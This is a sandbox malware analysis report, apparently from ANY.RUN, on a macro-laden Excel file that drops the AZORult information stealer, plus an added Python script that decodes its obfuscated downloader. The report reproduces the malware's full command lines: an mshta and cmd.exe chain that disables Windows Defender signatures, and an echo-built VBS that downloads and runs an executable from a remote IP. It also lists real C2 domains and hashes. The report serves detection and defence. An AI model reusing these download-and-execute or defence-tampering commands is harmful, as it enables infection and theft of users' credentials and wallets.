Sample summary:

Field | Value
---|---
File name | macro1.xls
Full analysis | https://app.any.run/tasks/43946ffa-7076-46a6-bff2-2962bae15781
Verdict | Malicious activity
Threats | AZORult, an information stealer that harvests banking data (saved passwords, credit card details) and cryptocurrency wallet data. The family is updated continuously and remains an active threat.
Analysis date | May 15, 2019, 18:05:13
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/vnd.ms-excel
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed May 15 14:17:11 2019, Security: 0
MD5 | 3E899273F9F64824B4DCA6F76489F838
SHA1 | 920BFB6AF30274DED15008418752EE0843107254
SHA256 | 605D446A2E183D025F9175F8829025EEF9FF45A59F941E2B0CACC1150B754BD7
SSDEEP | 768:/Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJhVpAZ8Tm:qk3hOdsylKlgxopeiBNhZFGzE+cL2kd0
File type identification:

Extension | Description | Match (%)
---|---|---
.xls | Microsoft Excel sheet | 48
.xls | Microsoft Excel sheet (alternate) | 39.2
Document metadata:

Field | Value
---|---
CompObjUserType | Microsoft Excel 2003 Worksheet
CompObjUserTypeLen | 32
HeadingPairs | —
TitleOfParts | Sheet1
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
Company | -
CodePage | Windows Latin 1 (Western European)
Security | None
ModifyDate | 2019:05:15 13:17:11
CreateDate | 2015:06:05 18:17:20
Software | Microsoft Excel
LastModifiedBy | -
Author | -
Processes:

PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3292 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe
2656 | mshta https://thisisredirectionpageonly.blogspot.com/p/adminhelpdesk.html | C:\Windows\system32\mshta.exe | — | EXCEL.EXE
3036 | "C:\Windows\System32\mshta.exe" http://pastebin.com/raw/A766dj3K | C:\Windows\System32\mshta.exe | — | mshta.exe
2884 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit | C:\Windows\System32\cmd.exe | — | mshta.exe
1132 | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://142.11.206.184/admin.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXE | C:\Windows\System32\cmd.exe | — | mshta.exe
456 | MpCmdRun.exe -removedefinitions -dynamicsignatures | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe
3380 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe
3452 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\UpdateWindow.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe
3772 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe
3756 | taskkill /f /im MSPUB.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe

Process details:

PID | User | Company | Description | Integrity level | Exit code | Version
---|---|---|---|---|---|---
3292 | admin | Microsoft Corporation | Microsoft Excel | MEDIUM | 1 | 14.0.6024.1000
2656 | admin | Microsoft Corporation | Microsoft (R) HTML Application host | MEDIUM | 0 | 8.00.7600.16385 (win7_rtm.090713-1255)
3036 | admin | Microsoft Corporation | Microsoft (R) HTML Application host | MEDIUM | 0 | 8.00.7600.16385 (win7_rtm.090713-1255)
2884 | admin | Microsoft Corporation | Windows Command Processor | MEDIUM | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1132 | admin | Microsoft Corporation | Windows Command Processor | MEDIUM | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
456 | admin | Microsoft Corporation | Microsoft Malware Protection Command Line Utility | MEDIUM | 2 | 6.1.7600.16385 (win7_rtm.090713-1255)
3380 | admin | Microsoft Corporation | Terminates Processes | MEDIUM | 128 | 6.1.7600.16385 (win7_rtm.090713-1255)
3452 | admin | Microsoft Corporation | Microsoft ® Windows Based Script Host | MEDIUM | 0 | 5.8.7600.16385
3772 | admin | Microsoft Corporation | Terminates Processes | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3756 | admin | Microsoft Corporation | Terminates Processes | MEDIUM | 128 | 6.1.7600.16385 (win7_rtm.090713-1255)
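The cmd.exe chain of PID 1132 writes UpdateWindow.vbs one `@echo ... >>UpdateWindow.vbs` at a time and hides the COM ProgIDs, the HTTP verb and the dropped file name behind `L0u()`, which does `Chr(Asc(c) - 13)` on every character. The script below is an added analyst helper, not part of the ANY.RUN report or of the malware: it rebuilds the VBS from that command line (embedded verbatim from the process table above), ports `L0u()` to Python and decodes every literal passed to it. The regexes assume the chain's own conventions, namely that no quoted argument contains `&` and that each echoed segment is exactly one VBS line.

```python
"""Rebuild UpdateWindow.vbs from the cmd.exe echo chain of PID 1132 and decode the
L0u()-obfuscated strings. Added analyst tooling; not part of the sandbox report."""
import re

# Command line of PID 1132, copied verbatim from the process table and split into
# adjacent raw-string pieces at '&' boundaries so it stays readable.
CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public '
    r'&@echo AmmEiqWkls = "http://142.11.206.184/admin.exe">>UpdateWindow.vbs '
    r'&@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs '
    r'&@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs '
    r'&@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs '
    r'&@echo ZIMMERing.send ("")>>UpdateWindow.vbs '
    r'&@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs '
    r'&@echo FatherOFVidus.Open>>UpdateWindow.vbs '
    r'&@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs '
    r'&@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs '
    r'& @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs '
    r'&@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs '
    r'&@echo FatherOFVidus.Close>>UpdateWindow.vbs '
    r'&@echo function L0u(K4d) >> UpdateWindow.vbs '
    r'&@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs '
    r'&@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs '
    r'&@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs '
    r'&@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs '
    r'&@echo Next >>UpdateWindow.vbs '
    r'&@echo L0u = VuzEgEas >>UpdateWindow.vbs '
    r'&@echo End Function >>UpdateWindow.vbs'
    r'& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXE'
)

# One '@echo <vbs line> >>UpdateWindow.vbs' per chain segment (spacing varies).
ECHO_RE = re.compile(r'^@?echo\s+(.*?)\s*>>\s*UpdateWindow\.vbs$')
# Every literal the script passes to its decoder function.
L0U_CALL_RE = re.compile(r'L0u\("([^"]*)"\)')


def split_chain(cmdline):
    """Split the 'cmd /c ...' body on '&'. Assumption: no quoted argument contains '&'."""
    body = cmdline.split(' /c ', 1)[1]
    return [seg.strip() for seg in body.split('&') if seg.strip()]


def rebuild_vbs(cmdline):
    """Reassemble the script exactly as the echo chain appended it to UpdateWindow.vbs."""
    lines = []
    for seg in split_chain(cmdline):
        m = ECHO_RE.match(seg)
        if m:
            lines.append(m.group(1))
    return '\n'.join(lines)


def l0u(encoded):
    """Python port of the VBS L0u(): shift every character back by 13 code points."""
    return ''.join(chr(ord(c) - 13) for c in encoded)


def decode_calls(vbs):
    """Map each obfuscated literal passed to L0u(...) to its plaintext, in script order."""
    return {enc: l0u(enc) for enc in L0U_CALL_RE.findall(vbs)}


def triage(cmdline):
    """Extract what an analyst wants from the chain: download URL, dropped file name,
    decoded COM objects and verbs, and the commands cmd.exe runs after writing the script."""
    vbs = rebuild_vbs(cmdline)
    decoded = decode_calls(vbs)
    url = re.search(r'"(https?://[^"]+)"', vbs).group(1)
    # The on-disk name is whatever variable is handed to ADODB.Stream.SaveToFile.
    var = re.search(r'\.SaveToFile\s+(\w+)', vbs).group(1)
    enc_name = re.search(r'\b%s\s*=\s*L0u\("([^"]*)"\)' % re.escape(var), vbs).group(1)
    post = [seg for seg in split_chain(cmdline) if not ECHO_RE.match(seg)]
    return {
        'vbs': vbs,
        'decoded': decoded,
        'url': url,
        'dropped_as': l0u(enc_name),
        'post_commands': post,
    }


if __name__ == '__main__':
    result = triage(CMDLINE)
    print(result['vbs'])
    for enc, plain in result['decoded'].items():
        print(f'{enc!r:22} -> {plain}')
    print('downloads', result['url'], 'to', result['dropped_as'])
    print('then runs:', ' && '.join(result['post_commands']))
```

The decoded values tie the rest of the report together: the script creates MSXML2.XMLHTTP, issues a GET for http://142.11.206.184/admin.exe (the WScript.exe request in the HTTP table), writes the response through ADODB.Stream as AVASTINT.EXE in C:\Users\Public, and cmd.exe deletes the VBS, waits 12 seconds and launches AVASTINT.EXE, which is the PID 2800 process that checks in to phonetechindia.tk and trips the AZORult signatures. Because UpdateWindow.vbs is deleted immediately after it runs, the file hash in the files table and the command line itself are the durable artefacts to hunt on.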
Files activity:

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3292 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRFAF7.tmp.cvr | — | — | —
3292 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF9D1D498569DAF3BD.TMP | — | — | —
2656 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\adminhelpdesk[1].html | html | 1FDB2BAD76A117A74AACFFA9A98F8794 | BC6C39659F63EA20E59573EBDCED60F71F657147A8EA2A16C38434C6477F88F5
1132 | cmd.exe | C:\Users\Public\UpdateWindow.vbs | text | 633984774035BDC5650790CABC272E9C | 86927A17E156AED5CC6346E7CF63A5EDC4B6061D6B031FD9AB4630A7FE7C60EC
3036 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\A766dj3K[1].txt | html | 34E3E1FD1749100B1F189B7A38F7B757 | 8B482793741500DDBD6C626AE4E5FFF0DFB27D8BC4B7ABD17A8C612A5B65C5A8
3292 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF7A6630901FF40243.TMP | document | 032162975E837EDD7E8967814C31A439 | 1AE3BE6230348A66D787D4FCBA25FB9CA6638B00B8CAA2B8274596769C1C1C97
2656 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\1961721879-ieretrofit[1].js | html | 2EB212E3AC3425A2A6BC22B4B1EEBF9D | 432D4759E839EAA812B10829AF91CFD71217D21244E9864700A8456DDA6DDC08
456 | MpCmdRun.exe | C:\Users\admin\AppData\Local\Temp\MpCmdRun.log | text | D7639C499A9BDAFF9A31E0A5D3C8ABDD | E8BA61617CFB251ECC025052F94BD819C77A8056813FC8C4F1FA90DC55DE7D68
3452 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\admin[1].exe | executable | 22E5B3DE6AB509F7490C52FE77D9F1CE | D64503A8EF7CC902266DC0FF286CF02145931F2CE387010EB7E81C5A178766FA
3036 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | 043F8DB45FDD58FB5309858B3D833852 | CD453A17F7FC8948177A5A33790D989454EF050D9C79613E2E1AF5240292B967
HTTP requests:

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
3452 | WScript.exe | GET | 200 | 142.11.206.184:80 | http://142.11.206.184/admin.exe | US | executable | 618 Kb | suspicious |
3036 | mshta.exe | GET | 200 | 104.20.209.21:80 | http://pastebin.com/raw/A766dj3K | US | html | 1.26 Kb | shared |
2800 | AVASTINT.EXE | POST | 200 | 194.32.79.169:80 | http://phonetechindia.tk/user2/Panel/index.php | unknown | txt | 4.27 Mb | malicious |
2800 | AVASTINT.EXE | POST | 200 | 194.32.79.169:80 | http://phonetechindia.tk/user2/Panel/index.php | unknown | text | 5 b | malicious |
Connections:

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
3036 | mshta.exe | 104.20.209.21:80 | pastebin.com | Cloudflare Inc | US | shared |
2656 | mshta.exe | 216.58.207.33:443 | thisisredirectionpageonly.blogspot.com | Google Inc. | US | whitelisted |
2656 | mshta.exe | 216.58.208.41:443 | www.blogger.com | Google Inc. | US | whitelisted |
3452 | WScript.exe | 142.11.206.184:80 | — | Hostwinds LLC. | US | suspicious |
2800 | AVASTINT.EXE | 194.32.79.169:80 | phonetechindia.tk | — | — | suspicious |
DNS requests:

Domain | IP | Reputation
---|---|---
thisisredirectionpageonly.blogspot.com | — | whitelisted
www.blogger.com | — | shared
resources.blogblog.com | — | whitelisted
pastebin.com | — | shared
phonetechindia.tk | — | malicious
IDS alerts (ET and PTsecurity signatures):

PID | Process | Class | Message
---|---|---|---
3036 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3452 | WScript.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3452 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
3452 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3452 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
3452 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
2800 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
2800 | AVASTINT.EXE | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
2800 | AVASTINT.EXE | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header |
2800 | AVASTINT.EXE | Potentially Bad Traffic | ET POLICY HTTP Request to a *.tk domain |